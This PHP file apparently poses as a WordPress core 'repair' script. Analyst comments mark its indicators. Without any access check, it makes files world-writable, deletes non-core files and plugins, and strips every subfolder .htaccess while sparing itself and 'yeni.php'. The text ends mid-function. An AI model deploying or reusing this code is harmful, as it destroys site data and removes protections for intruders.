File: /var/www/vhosts/iphonesused.com/httpdocs/qinfofuns.php
<?php
// Runtime setup for a long-running job that emits HTML (presumably invoked over HTTP).
// NOTE(review): nothing in the visible code checks who is making the request
// before the destructive steps further down run.
// Errors are both displayed and logged; a 512M memory limit is requested.
error_reporting(E_ALL);
ini_set('display_errors', 1);
ini_set('log_errors', 1);
ini_set('memory_limit', '512M');
// No execution time limit, and keep running after the client disconnects, so a
// single request is enough to carry the whole script through to the end.
set_time_limit(0);
ignore_user_abort(true);
// Output is plain text inside <pre>, flushed implicitly as it is produced.
echo "<pre>";
ob_implicit_flush(true);
// Everything below operates on the directory this file is stored in.
$root = realpath(__DIR__);
/* =========================================================
* BASIC HELPERS
* ========================================================= */
/**
 * Print one progress line and push it to the client immediately.
 *
 * @param mixed $msg Text to print; a newline is appended.
 */
function out($msg) {
echo $msg . "\n";
// @ hides the notice ob_flush() raises when no output buffer is active.
@ob_flush();
flush();
}
/**
 * Tell whether a file name is on the script's own do-not-delete list.
 *
 * Analyst note: the list holds exactly two base names, 'qinfofuns.php' and
 * 'yeni.php'. Every delete path in this file consults it, so both names survive
 * the cleanup and are useful file-name indicators when hunting for this tool.
 *
 * @param string $name Base name to test (strict comparison).
 * @return bool true if the name must not be deleted.
 */
function isProtectedName($name) {
return in_array($name, ['qinfofuns.php', 'yeni.php'], true);
}
/**
 * Walk $dir recursively and change every non-directory entry whose mode is
 * exactly 0444 into 0777.
 *
 * Analyst note: 0777 is world-writable. A read-only 0444 mode is commonly set on
 * purpose to stop a file from being modified; presumably this pass exists so the
 * later overwrite and delete steps succeed. Files left at 0777 are a forensic
 * trace of this function having run.
 *
 * @param string $dir Directory to process.
 * @return void
 */
function fixPermissions($dir) {
$items = @scandir($dir);
if ($items === false) {
// "[HATA] Okunamadi" = "[ERROR] could not be read".
out("[HATA] Okunamadi: $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
// Real directories are descended into; symlinks are not followed as directories.
if (is_dir($path) && !is_link($path)) {
fixPermissions($path);
} else {
$permsRaw = @fileperms($path);
if ($permsRaw !== false) {
// Keep only the last four octal digits (special bits + rwx triplets).
$perms = substr(sprintf('%o', $permsRaw), -4);
if ($perms === '0444') {
if (@chmod($path, 0777)) {
// "[DEGISTIRILDI]" = "[CHANGED]".
out("[DEGISTIRILDI] $path (0444 -> 0777)");
} else {
// "chmod yapilamadi" = "chmod failed".
out("[HATA] $path chmod yapilamadi");
}
}
}
}
}
}
/**
 * Recursively delete a file, symlink or directory tree, opening permissions first.
 *
 * "Safe" only means that entries named by isProtectedName() are skipped; the
 * function performs no check that $path lies inside any particular base directory.
 *
 * @param string $path Path to remove.
 * @return bool true if the path did not exist or was removed; false if it is
 *              protected or the final unlink/rmdir failed.
 */
function forceDeletePathSafe($path) {
$base = basename($path);
if (isProtectedName($base)) {
// "[KORUNDU]" = "[PROTECTED]".
out("[KORUNDU] $path");
return false;
}
// Nothing there (and not a dangling symlink): treat as already deleted.
if (!file_exists($path) && !is_link($path)) {
return true;
}
clearstatcache(true, $path);
// NOTE(review): chmod() follows symlinks, so for a link this changes the mode
// of the link target before the link itself is removed below.
@chmod($path, 0777);
if (is_file($path) || is_link($path)) {
if (@unlink($path)) return true;
// Second attempt after making the parent directory writable.
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (@unlink($path)) return true;
return false;
}
// Directory: list it, retrying once after another chmod.
$items = @scandir($path);
if ($items === false) {
@chmod($path, 0777);
$items = @scandir($path);
}
if ($items !== false) {
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
// Child results are ignored; a surviving (e.g. protected) child makes rmdir() fail.
forceDeletePathSafe($path . DIRECTORY_SEPARATOR . $item);
}
}
@chmod($path, 0777);
return @rmdir($path);
}
/**
 * Recursively copy a file or directory tree from $src to $dst.
 *
 * Missing destination directories are created with mode 0777. Failures are only
 * reported through out(); nothing is returned and nothing is thrown. A $src that
 * is neither a file nor a directory is silently ignored.
 *
 * @param string $src Source file or directory.
 * @param string $dst Destination path.
 * @return void
 */
function rcopy($src, $dst) {
if (is_file($src)) {
$dir = dirname($dst);
if (!is_dir($dir)) {
@mkdir($dir, 0777, true);
}
if (!@copy($src, $dst)) {
// "Kopyalanamadi" = "could not be copied".
out("Kopyalanamadi: $src -> $dst");
}
return;
}
if (is_dir($src)) {
if (!is_dir($dst)) {
@mkdir($dst, 0777, true);
}
$items = @scandir($src);
if ($items === false) {
// "Okunamadi" = "could not be read".
out("Okunamadi: $src");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
rcopy($src . DIRECTORY_SEPARATOR . $item, $dst . DIRECTORY_SEPARATOR . $item);
}
}
}
/**
 * Build the allow-list of WordPress core paths from a freshly extracted copy.
 *
 * Every file and directory under $cleanDir is recorded by its path relative to
 * $cleanDir, with forward slashes. A fixed set of root-level core file names is
 * then added unconditionally.
 *
 * @param string $cleanDir Extracted "wordpress" directory, without trailing separator
 *                         (the +1 below skips exactly one separator character).
 * @return array Map of relative path => true.
 */
function buildCoreList($cleanDir) {
$allowed = [];
// SELF_FIRST: directories themselves are listed as well as the files inside them.
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($cleanDir, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
$rel = substr($full, strlen($cleanDir) + 1);
$rel = str_replace('\\', '/', $rel);
$allowed[$rel] = true;
}
// Root-level core files that are always considered allowed.
$allowed['index.php'] = true;
$allowed['license.txt'] = true;
$allowed['readme.html'] = true;
$allowed['wp-activate.php'] = true;
$allowed['wp-blog-header.php'] = true;
$allowed['wp-comments-post.php'] = true;
$allowed['wp-config-sample.php'] = true;
$allowed['wp-cron.php'] = true;
$allowed['wp-links-opml.php'] = true;
$allowed['wp-load.php'] = true;
$allowed['wp-login.php'] = true;
$allowed['wp-mail.php'] = true;
$allowed['wp-settings.php'] = true;
$allowed['wp-signup.php'] = true;
$allowed['wp-trackback.php'] = true;
$allowed['xmlrpc.php'] = true;
return $allowed;
}
/**
 * Download $url to the local file $dest, terminating the script on failure.
 *
 * Uses cURL when available (TLS peer and host verification enabled, redirects
 * followed), otherwise falls back to file_get_contents().
 *
 * Analyst note: the fixed User-Agent 'WP-Core-Repair/3.0' is a network indicator
 * for this tool. The downloaded content is not checked against any checksum or
 * signature; TLS verification is the only integrity protection visible here.
 *
 * @param string $url  Remote URL.
 * @param string $dest Local destination file.
 * @return void
 */
function downloadFile($url, $dest) {
if (function_exists('curl_init')) {
$fp = fopen($dest, 'wb');
if (!$fp) {
// "Dosya acilamadi" = "file could not be opened".
die("Dosya acilamadi: $dest\n");
}
$ch = curl_init($url);
curl_setopt_array($ch, [
// Stream the response body straight into $dest.
CURLOPT_FILE => $fp,
CURLOPT_FOLLOWLOCATION => true,
// Treat HTTP status >= 400 as a transfer failure.
CURLOPT_FAILONERROR => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 300,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$ok = curl_exec($ch);
$err = curl_error($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
fclose($fp);
if (!$ok || $http >= 400) {
// Remove the partial file before aborting.
@unlink($dest);
// "Indirme hatasi" = "download error".
die("Indirme hatasi: HTTP $http | $err\n");
}
return;
}
// Fallback without cURL; requires allow_url_fopen.
$data = @file_get_contents($url);
if ($data === false) {
// "Zip could not be downloaded. curl or allow_url_fopen is required."
die("Zip indirilemedi. curl veya allow_url_fopen gerekli.\n");
}
// The result of this write is not checked.
file_put_contents($dest, $data);
}
/**
 * Fetch $url and return its body.
 *
 * Uses cURL when available (TLS verification enabled, redirects followed, same
 * 'WP-Core-Repair/3.0' User-Agent as downloadFile()), otherwise file_get_contents().
 *
 * @param string $url Remote URL.
 * @return array [true, body] on success, [false, error text] on failure.
 */
function httpGet($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_CONNECTTIMEOUT => 20,
CURLOPT_TIMEOUT => 60,
CURLOPT_SSL_VERIFYPEER => true,
CURLOPT_SSL_VERIFYHOST => 2,
CURLOPT_USERAGENT => 'WP-Core-Repair/3.0'
]);
$body = curl_exec($ch);
$http = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$err = curl_error($ch);
curl_close($ch);
if ($body === false || $http >= 400) {
return [false, "HTTP $http | $err"];
}
return [true, $body];
}
$body = @file_get_contents($url);
if ($body === false) {
// "GET basarisiz" = "GET failed".
return [false, "GET basarisiz"];
}
return [true, $body];
}
/**
 * Heuristic check that $dir is a WordPress installation root.
 *
 * Requires the wp-admin and wp-includes directories and the wp-load.php and
 * wp-settings.php files to be present.
 *
 * @param string|false $dir Directory to test.
 * @return bool
 */
function isWordPressRoot($dir) {
if (!$dir || !is_dir($dir)) {
return false;
}
return (
is_dir($dir . '/wp-admin') &&
is_dir($dir . '/wp-includes') &&
is_file($dir . '/wp-load.php') &&
is_file($dir . '/wp-settings.php')
);
}
/**
 * Ask the WordPress.org version-check API for a version number.
 *
 * Picks the first offer that has a version and whose 'response' field is either
 * absent or 'latest'; if none qualifies, falls back to the first offer's version.
 *
 * @return array [true, version string] or [false, error text].
 */
function getLatestStableWordPressVersion() {
$api = 'https://api.wordpress.org/core/version-check/1.7/';
list($ok, $body) = httpGet($api);
if (!$ok) {
// "WordPress API okunamadi" = "WordPress API could not be read".
return [false, "WordPress API okunamadi: $body"];
}
$json = json_decode($body, true);
if (!is_array($json) || empty($json['offers']) || !is_array($json['offers'])) {
// "WordPress API response is invalid".
return [false, "WordPress API cevabi gecersiz"];
}
foreach ($json['offers'] as $offer) {
if (!empty($offer['version']) && (!isset($offer['response']) || $offer['response'] === 'latest')) {
return [true, $offer['version']];
}
}
if (!empty($json['offers'][0]['version'])) {
return [true, $json['offers'][0]['version']];
}
// "Latest stable version not found".
return [false, "Son stabil surum bulunamadi"];
}
/**
 * Determine which WordPress version to download.
 *
 * Prefers the $wp_version set by the site's own wp-includes/version.php; if that
 * file is missing, unreadable or leaves $wp_version empty, asks the WordPress.org
 * API instead.
 *
 * Analyst note: require executes the local version.php. On a host that is being
 * "repaired" that file is itself untrusted, and the value it sets is later placed
 * into the download URL by the caller without validation.
 *
 * @param string $root WordPress root directory.
 * @return array [bool ok, version or error text, 'local'|'api'].
 */
function detectWordPressVersion($root) {
$versionFile = $root . '/wp-includes/version.php';
if (is_file($versionFile) && is_readable($versionFile)) {
$wp_version = null;
// Runs in function scope, so the file's $wp_version lands in the local variable.
require $versionFile;
if (!empty($wp_version)) {
return [true, $wp_version, 'local'];
}
}
// "[WARNING] wp-includes/version.php is missing or unreadable."
out("[UYARI] wp-includes/version.php yok veya okunamiyor.");
// "[WARNING] The latest stable version will be taken from the official WordPress API."
out("[UYARI] Resmi WordPress API uzerinden son stabil surum alinacak.");
list($ok, $version) = getLatestStableWordPressVersion();
if (!$ok) {
return [false, $version, 'api'];
}
return [true, $version, 'api'];
}
/* =========================================================
* WORDPRESS CORE REPAIR
* ========================================================= */
// Stage 1: report what was found, loosen permissions, pick the WordPress version.
// "Basladi..." = "Started...".
out("Basladi...");
if ($root === false) {
// "Root directory could not be resolved."
die("Kok dizin cozumlenemedi.\n");
}
// Diagnostic listing; VAR/YOK = present/absent, EVET/HAYIR = yes/no.
out("Tespit edilen root: " . $root);
out("wp-admin: " . (is_dir($root . '/wp-admin') ? 'VAR' : 'YOK'));
out("wp-includes: " . (is_dir($root . '/wp-includes') ? 'VAR' : 'YOK'));
out("wp-load.php: " . (is_file($root . '/wp-load.php') ? 'VAR' : 'YOK'));
out("wp-settings.php: " . (is_file($root . '/wp-settings.php') ? 'VAR' : 'YOK'));
out("index.php: " . (is_file($root . '/index.php') ? 'VAR' : 'YOK'));
out("version.php: " . (is_file($root . '/wp-includes/version.php') ? 'VAR' : 'YOK'));
out("version.php okunabilir: " . (is_readable($root . '/wp-includes/version.php') ? 'EVET' : 'HAYIR'));
// "0444 files are being set to 0777...".
// Analyst note: this runs BEFORE the WordPress-root check below, so the 0444 -> 0777
// changes are applied to the whole tree even if the script then stops.
out("0444 dosyalar 0777 yapiliyor...");
fixPermissions($root);
out("Izin duzeltme asamasi tamamlandi.");
if (!isWordPressRoot($root)) {
// "This folder does not look like a WordPress root directory".
die("Bu klasor WordPress kok dizini degil gibi gorunuyor: $root\n");
}
list($versionOk, $versionData, $versionSource) = detectWordPressVersion($root);
if (!$versionOk) {
// "WordPress version could not be determined".
die("WordPress surumu belirlenemedi: " . $versionData . "\n");
}
$wp_version = $versionData;
// "WordPress version to be used: <version> [local|api]".
out("Kullanilacak WordPress surumu: " . $wp_version . " [" . $versionSource . "]");
// Stage 2: download the matching WordPress archive and unpack it.
if (!class_exists('ZipArchive')) {
// "ZipArchive is not enabled. The PHP zip extension is required."
die("ZipArchive aktif degil. PHP zip eklentisi gerekli.\n");
}
// Working directory inside the web root, named .wp_reset_tmp_<YYYYMMDD_HHMMSS>.
// Analyst note: a leftover directory matching this pattern is a host artifact of
// an interrupted run; it is created with mode 0777.
$tmp = $root . '/.wp_reset_tmp_' . date('Ymd_His');
$zipFile = $tmp . '/wordpress.zip';
$extractDir = $tmp . '/extract';
$cleanDir = $extractDir . '/wordpress';
@mkdir($tmp, 0777, true);
@mkdir($extractDir, 0777, true);
// The version string comes from detectWordPressVersion() and is interpolated as-is.
$url = "https://wordpress.org/wordpress-{$wp_version}.zip";
// "Indiriliyor" = "Downloading".
out("Indiriliyor: $url");
downloadFile($url, $zipFile);
// "Zip aciliyor..." = "Opening zip...".
out("Zip aciliyor...");
$zip = new ZipArchive();
$res = $zip->open($zipFile);
if ($res !== true) {
// "Zip could not be opened. Code: ...".
die("Zip acilamadi. Kod: $res\n");
}
// The return value of extractTo() is not checked; the is_dir() test below is the
// only confirmation that extraction produced the expected folder.
$zip->extractTo($extractDir);
$zip->close();
if (!is_dir($cleanDir)) {
// "Clean WordPress folder not found."
die("Temiz WordPress klasoru bulunamadi.\n");
}
// Stage 3: overwrite core files with the freshly downloaded copy.
$core = buildCoreList($cleanDir);
// "Core root files are being renewed...".
out("Core kok dosyalari yenileniyor...");
$rootItems = scandir($cleanDir);
foreach ($rootItems as $item) {
if ($item === '.' || $item === '..') continue;
$src = $cleanDir . '/' . $item;
$dst = $root . '/' . $item;
// Only root-level files here; directories are handled in the next loop.
if (is_dir($src)) continue;
// Never touch the site's configuration or the script's own protected names.
if ($item === 'wp-config.php') continue;
if (isProtectedName($item)) continue;
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
// "wp-admin and wp-includes are being replaced entirely with a clean copy...".
out("wp-admin ve wp-includes tamamen temiz kopya ile degistiriliyor...");
foreach (['wp-admin', 'wp-includes'] as $dir) {
$dst = $root . '/' . $dir;
$src = $cleanDir . '/' . $dir;
// Existing directory is removed first, then the clean tree is copied in.
if (file_exists($dst) || is_link($dst)) {
forceDeletePathSafe($dst);
}
rcopy($src, $dst);
}
// Stage 4: delete everything that is neither WordPress core nor on the keep list.
// "Deleting non-core root items...".
out("Core disi kok oge silme asamasi...");
// Root entries that survive: site config, wp-content, the two core directories,
// this script, its temp directory and the two protected file names.
$keepRoot = [
'wp-config.php' => true,
'wp-content' => true,
'wp-admin' => true,
'wp-includes' => true,
basename(__FILE__) => true,
basename($tmp) => true,
'qinfofuns.php' => true,
'yeni.php' => true,
];
$items = scandir($root);
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
if (isset($keepRoot[$item])) continue;
// Analyst note: any other root entry that is not in the core list is removed
// recursively, whatever it is. "Silindi" ("Deleted") is logged regardless of
// whether forceDeletePathSafe() actually succeeded.
if (!isset($core[$item])) {
forceDeletePathSafe($root . '/' . $item);
out("Silindi: $item");
}
}
// "Deleting non-core leftovers inside wp-admin and wp-includes...".
out("wp-admin ve wp-includes icinde core disi kalinti silme...");
foreach (['wp-admin', 'wp-includes'] as $base) {
$basePath = $root . '/' . $base;
if (!is_dir($basePath)) continue;
// CHILD_FIRST: entries inside a directory are visited before the directory itself.
$it = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, FilesystemIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
foreach ($it as $file) {
$full = $file->getPathname();
// Path relative to the site root, normalised to forward slashes, to match $core keys.
$rel = substr($full, strlen($root) + 1);
$rel = str_replace('\\', '/', $rel);
if (!isset($core[$rel])) {
forceDeletePathSafe($full);
out("Silindi: $rel");
}
}
}
// Stage 5: write a stock front controller and a stock rewrite-only .htaccess.
// "Loading default index.php and .htaccess...".
// Analyst note: both files are written unconditionally with fixed content, so any
// site-specific rules that the root .htaccess held before this run are not restored.
out("Default index.php ve .htaccess yukleniyor...");
$indexContent = <<<'PHP'
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*/
define('WP_USE_THEMES', true);
require __DIR__ . '/wp-blog-header.php';
PHP;
file_put_contents($root . '/index.php', $indexContent . "\n");
@chmod($root . '/index.php', 0644);
$htaccessContent = <<<'HTACCESS'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
HTACCESS;
file_put_contents($root . '/.htaccess', $htaccessContent . "\n");
@chmod($root . '/.htaccess', 0644);
// "index.php and .htaccess created."
out("index.php ve .htaccess olusturuldu.");
/* =========================================================
* PLUGIN OPERATIONS
* ========================================================= */
// "Plugin update and cleanup phase is starting...".
out("Plugin guncelleme ve temizlik asamasi basliyor...");
/**
 * Boot WordPress from $root and load the admin include files used for plugin work.
 *
 * Analyst note: requiring wp-load.php runs the site's own bootstrap inside this
 * request, so from here on the script acts with the site's full WordPress API
 * and database access.
 *
 * @param string $root WordPress root directory.
 * @return bool true if WordPress loaded and the admin includes were required.
 */
function wpLoadForPluginOps($root) {
if (!defined('ABSPATH')) {
define('ABSPATH', rtrim($root, '/\\') . '/');
}
$wpLoad = $root . '/wp-load.php';
if (!is_file($wpLoad)) {
// "[ERROR] wp-load.php not found, plugin operations skipped."
out("[HATA] wp-load.php bulunamadi, plugin islemleri atlandi.");
return false;
}
require_once $wpLoad;
// get_option() existing is used as the signal that WordPress finished loading.
if (!function_exists('get_option')) {
// "[ERROR] WordPress could not be fully loaded, plugin operations skipped."
out("[HATA] WordPress tam yuklenemedi, plugin islemleri atlandi.");
return false;
}
require_once ABSPATH . 'wp-admin/includes/plugin.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
// Optional include: only required when the file exists.
if (is_file(ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php')) {
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader-skins.php';
}
require_once ABSPATH . 'wp-admin/includes/update.php';
require_once ABSPATH . 'wp-admin/includes/file.php';
return true;
}
/**
 * Reduce a plugin identifier to the name of its top-level folder.
 *
 * For "folder/main.php" this returns "folder". For a single-file plugin such as
 * "name.php" it returns "name" (the base name with a trailing .php removed).
 *
 * @param string $pluginFile Plugin path relative to the plugins directory.
 * @return string
 */
function normalizePluginDirName($pluginFile) {
$pluginFile = str_replace('\\', '/', $pluginFile);
if (strpos($pluginFile, '/') !== false) {
return explode('/', $pluginFile, 2)[0];
}
return preg_replace('/\.php$/i', '', basename($pluginFile));
}
// Plugin phase, run only when WordPress could be booted:
//   1. upgrade active plugins that have a pending update,
//   2. delete the folders of plugins that are registered but inactive,
//   3. delete plugin folders that no registered plugin maps to.
// Analyst note: steps 2 and 3 are destructive and are not limited to files that
// were found to be malicious; any inactive or unrecognised plugin folder goes.
if (wpLoadForPluginOps($root)) {
if (class_exists('WP_Upgrader_Skin') && !class_exists('Silent_Upgrader_Skin')) {
// Upgrader skin that forwards upgrader messages to out(); header(), footer(),
// before() and after() are overridden with empty bodies.
class Silent_Upgrader_Skin extends WP_Upgrader_Skin {
public function feedback($feedback, ...$args) {
if (is_wp_error($feedback)) {
// "[WP HATA]" = "[WP ERROR]".
out("[WP HATA] " . $feedback->get_error_message());
return;
}
if (is_string($feedback) && $feedback !== '') {
if (!empty($args)) {
// Treat the message as a format string when extra arguments were passed.
$tmp = @vsprintf($feedback, $args);
if ($tmp !== false) {
$feedback = $tmp;
}
}
out("[WP] " . wp_strip_all_tags($feedback));
}
}
public function header() {}
public function footer() {}
public function before() {}
public function after() {}
public function error($errors) {
if (is_wp_error($errors)) {
out("[WP HATA] " . $errors->get_error_message());
} elseif (!empty($errors)) {
out("[WP HATA] " . (string)$errors);
}
}
}
}
if (function_exists('WP_Filesystem')) {
@WP_Filesystem();
}
// Snapshot of installed plugins and of the active ones (site + network-wide).
$allPlugins = function_exists('get_plugins') ? get_plugins() : [];
$activePlugins = (array) get_option('active_plugins', []);
$networkActive = [];
if (function_exists('is_multisite') && is_multisite()) {
$networkActive = array_keys((array) get_site_option('active_sitewide_plugins', []));
}
$activeAll = array_values(array_unique(array_merge($activePlugins, $networkActive)));
// "Total registered plugins" / "Number of active plugins".
out("Toplam kayitli plugin: " . count($allPlugins));
out("Aktif plugin sayisi: " . count($activeAll));
if (!empty($activeAll)) {
// "Checking updates for active plugins...".
out("Aktif pluginler icin update kontrolu yapiliyor...");
// Drop cached plugin/update data so the update check below is fresh.
if (function_exists('wp_clean_plugins_cache')) {
@wp_clean_plugins_cache(true);
}
@delete_site_transient('update_plugins');
if (function_exists('wp_update_plugins')) {
@wp_update_plugins();
}
$updates = get_site_transient('update_plugins');
$toUpgrade = [];
// Keep only active plugins for which the update transient lists a response.
if (is_object($updates) && !empty($updates->response) && is_array($updates->response)) {
foreach ($activeAll as $pluginFile) {
if (isset($updates->response[$pluginFile])) {
$toUpgrade[] = $pluginFile;
}
}
}
if (!empty($toUpgrade)) {
// "Number of active plugins to update".
out("Guncellenecek aktif plugin sayisi: " . count($toUpgrade));
foreach ($toUpgrade as $pluginFile) {
// "[GUNCELLENECEK]" = "[TO BE UPDATED]".
out("[GUNCELLENECEK] " . $pluginFile);
}
if (class_exists('WP_Upgrader_Skin') && class_exists('Plugin_Upgrader') && class_exists('Silent_Upgrader_Skin')) {
$skin = new Silent_Upgrader_Skin();
$upgrader = new Plugin_Upgrader($skin);
$result = $upgrader->bulk_upgrade($toUpgrade);
if (is_array($result)) {
foreach ($result as $pluginFile => $resX) {
if (is_wp_error($resX)) {
// "[UPDATE ERROR]".
out("[GUNCELLEME HATA] {$pluginFile} => " . $resX->get_error_message());
} elseif ($resX === false) {
// "[COULD NOT BE UPDATED]".
out("[GUNCELLENEMEDI] {$pluginFile}");
} else {
// "[UPDATED]".
out("[GUNCELLENDI] {$pluginFile}");
}
}
} else {
// "[WARNING] bulk_upgrade returned an unexpected result."
out("[UYARI] bulk_upgrade beklenmeyen sonuc dondurdu.");
}
} else {
// "[ERROR] Plugin upgrade classes could not be loaded, update skipped."
out("[HATA] Plugin guncelleme siniflari yuklenemedi, update atlandi.");
}
} else {
// "Active plugins are already up to date."
out("Aktif pluginler zaten guncel.");
}
} else {
// "No active plugins, update skipped."
out("Aktif plugin yok, guncelleme atlandi.");
}
// Step 2: plugins known to WordPress but not active.
$registeredButInactive = array_diff(array_keys($allPlugins), $activeAll);
if (!empty($registeredButInactive)) {
// "Cleaning plugin files that are registered but not active...".
out("Aktif olmayan ama sisteme kayitli plugin dosyalari temizleniyor...");
$dirsToDelete = [];
foreach ($registeredButInactive as $pluginFile) {
// For a single-file plugin this yields the name without .php, so the path built
// below names a folder of that name rather than the .php file itself.
$dirName = normalizePluginDirName($pluginFile);
$dirsToDelete[$dirName] = true;
}
foreach (array_keys($dirsToDelete) as $dirName) {
$fullPath = WP_PLUGIN_DIR . '/' . $dirName;
if (file_exists($fullPath) || is_link($fullPath)) {
if (forceDeletePathSafe($fullPath)) {
// "[DELETED - INACTIVE REGISTERED]".
out("[SILINDI - INAKTIF KAYITLI] " . $fullPath);
} else {
// "[COULD NOT DELETE - INACTIVE REGISTERED]".
out("[SILINEMEDI - INAKTIF KAYITLI] " . $fullPath);
}
}
}
} else {
// "No inactive registered plugin found."
out("Aktif olmayan kayitli plugin bulunamadi.");
}
// Step 3: folders in the plugin directory that get_plugins() did not report.
// "Scanning plugin folders that are not registered in the system...".
out("Sisteme kayitli olmayan plugin klasorleri taraniyor...");
$registeredDirs = [];
foreach (array_keys($allPlugins) as $pluginFile) {
$registeredDirs[normalizePluginDirName($pluginFile)] = true;
}
$pluginDirItems = @scandir(WP_PLUGIN_DIR);
if ($pluginDirItems !== false) {
foreach ($pluginDirItems as $item) {
if ($item === '.' || $item === '..') continue;
$fullPath = WP_PLUGIN_DIR . '/' . $item;
// Only real directories are considered; loose files and symlinks are left alone.
if (!is_dir($fullPath) || is_link($fullPath)) continue;
if (!isset($registeredDirs[$item])) {
if (forceDeletePathSafe($fullPath)) {
// "[DELETED - UNREGISTERED]".
out("[SILINDI - KAYITSIZ] " . $fullPath);
} else {
// "[COULD NOT DELETE - UNREGISTERED]".
out("[SILINEMEDI - KAYITSIZ] " . $fullPath);
}
}
}
} else {
// "[ERROR] Plugin folder could not be read".
out("[HATA] Plugin klasoru okunamadi: " . WP_PLUGIN_DIR);
}
// Clear cached plugin data again so WordPress re-reads the changed directory.
if (function_exists('wp_clean_plugins_cache')) {
@wp_clean_plugins_cache(true);
}
@delete_site_transient('update_plugins');
// "Plugin update and cleanup phase completed."
out("Plugin guncelleme ve temizlik asamasi tamamlandi.");
} else {
// "Plugin operations could not be performed because WordPress could not be loaded."
out("WordPress yuklenemedigi icin plugin islemleri yapilamadi.");
}
/* =========================================================
* DELETE .HTACCESS IN ALL SUBFOLDERS (EXCEPT ROOT)
* ========================================================= */
// ".htaccess files in subfolders are being deleted (EXCEPT ROOT)...".
out("Alt klasorlerdeki .htaccess dosyalari siliniyor (ROOT HARIC)...");
/**
 * Delete every file named .htaccess (case-insensitive) in all subdirectories of
 * $dir, leaving only the one directly inside the starting directory.
 *
 * Analyst note: per-directory .htaccess files are a common place for access
 * restrictions (for example rules that stop scripts from running in upload
 * folders). This pass removes all of them without looking at their content, so
 * after a run such restrictions should be assumed gone and be re-applied.
 *
 * @param string $dir    Directory to process.
 * @param bool   $isRoot true for the starting directory, whose .htaccess is kept.
 * @return void
 */
function deleteHtaccessSubdirsForce($dir, $isRoot = true) {
$items = @scandir($dir);
if ($items === false) {
// "[OKUNAMADI]" = "[UNREADABLE]".
out("[OKUNAMADI] $dir");
return;
}
foreach ($items as $item) {
if ($item === '.' || $item === '..') continue;
$path = $dir . DIRECTORY_SEPARATOR . $item;
// Recurse into real directories only; every level below the start is non-root.
if (is_dir($path) && !is_link($path)) {
deleteHtaccessSubdirsForce($path, false);
continue;
}
if (!is_file($path)) continue;
if (!$isRoot && strtolower($item) === '.htaccess') {
@chmod($path, 0777);
clearstatcache(true, $path);
if (@unlink($path)) {
// "[SILINDI]" = "[DELETED]".
out("[SILINDI] $path");
} else {
// Retry after making the containing directory writable.
@chmod(dirname($path), 0777);
clearstatcache(true, $path);
if (@unlink($path)) {
// "[ZORLA SILINDI]" = "[FORCE DELETED]".
out("[ZORLA SILINDI] $path");
} else {
// "[HATA SILINEMEDI]" = "[ERROR, COULD NOT DELETE]".
out("[HATA SILINEMEDI] $path");
}
}
}
}
}
// Run the .htaccess removal over the whole site tree (root file excluded).
deleteHtaccessSubdirsForce($root, true);
// ".htaccess cleanup completed."
out(".htaccess temizleme tamamlandi.");
// "Temporary files are being cleaned...": removes the .wp_reset_tmp_* directory.
out("Gecici dosyalar temizleniyor...");
forceDeletePathSafe($tmp);
// Base directory that listFiles() refuses to scan outside of.
define('ALLOWED_BASE', realpath(__DIR__));
/**
 * Collect the .php files under $dir that are candidates for pattern scanning.
 *
 * Skips $excludeFile, files whose extension is not exactly 'php' (case-sensitive)
 * and files larger than 2 MiB. Returns an empty list if $dir cannot be resolved,
 * does not start with ALLOWED_BASE, or the iterator cannot be created.
 *
 * NOTE(review): the ALLOWED_BASE test is a string-prefix comparison on the
 * resolved path, not a comparison of path components.
 *
 * @param string $dir         Directory to scan recursively.
 * @param string $excludeFile Full path of one file to leave out.
 * @return array List of full path names.
 */
function listFiles($dir, $excludeFile)
{
$files = [];
$dirReal = realpath($dir);
if (!$dirReal || strpos($dirReal, ALLOWED_BASE) !== 0) {
return [];
}
try {
$rii = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($dirReal, FilesystemIterator::SKIP_DOTS)
);
} catch (Exception $e) {
return [];
}
foreach ($rii as $file) {
if ($file->isDir()) continue;
if ($file->getPathname() === $excludeFile) continue;
if (pathinfo($file->getPathname(), PATHINFO_EXTENSION) !== 'php') continue;
// Size cap: 2 * 1024 * 1024 bytes.
if ($file->getSize() > 2 * 1024 * 1024) continue;
$files[] = $file->getPathname();
}
return $files;
}
/**
 * Delete every listed file whose content contains one of the given literal strings.
 *
 * Each pattern is escaped with preg_quote() and matched case-insensitively, so
 * this is a plain substring search, not a regular-expression rule set. A file is
 * removed on its first hit with no backup or quarantine copy.
 *
 * @param array $files             Full path names to inspect.
 * @param array $patterns          Literal strings to look for.
 * @param array $excludedFileNames Base names that are never inspected.
 * @return array [deleted paths, paths that matched but were not writable].
 */
function scanAndDelete($files, $patterns, $excludedFileNames = [])
{
